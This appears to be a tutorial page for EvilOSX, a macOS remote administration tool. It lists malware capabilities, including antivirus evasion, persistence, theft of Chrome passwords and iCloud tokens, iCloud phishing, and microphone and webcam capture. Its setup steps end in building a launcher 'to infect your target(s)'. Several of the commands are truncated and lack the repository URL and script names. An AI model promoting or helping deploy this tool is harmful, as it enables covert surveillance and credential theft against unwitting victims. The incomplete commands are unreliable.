Video Tutorials

EvilOSX – Evil Remote Administration Tool (RAT) for macOS/OS X – Kali Linux 2018.2

Evil Remote Administration Tool (RAT) for macOS/OS X


  • Emulate a terminal instance
  • Simple extendable module system
  • No bot dependencies (pure python)
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes
  • iTunes (iOS) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

The server side requires python3 to run.
The bot side is written in python2 which is already installed on macOS / OS X.

Once python3 is installed, open a terminal and type the following:

# Clone or download this repository
$ git clone

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Build a launcher to infect your target(s)
$ python3

# Start listening for connections
$ python3

# Lastly, run the built launcher on your target

Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.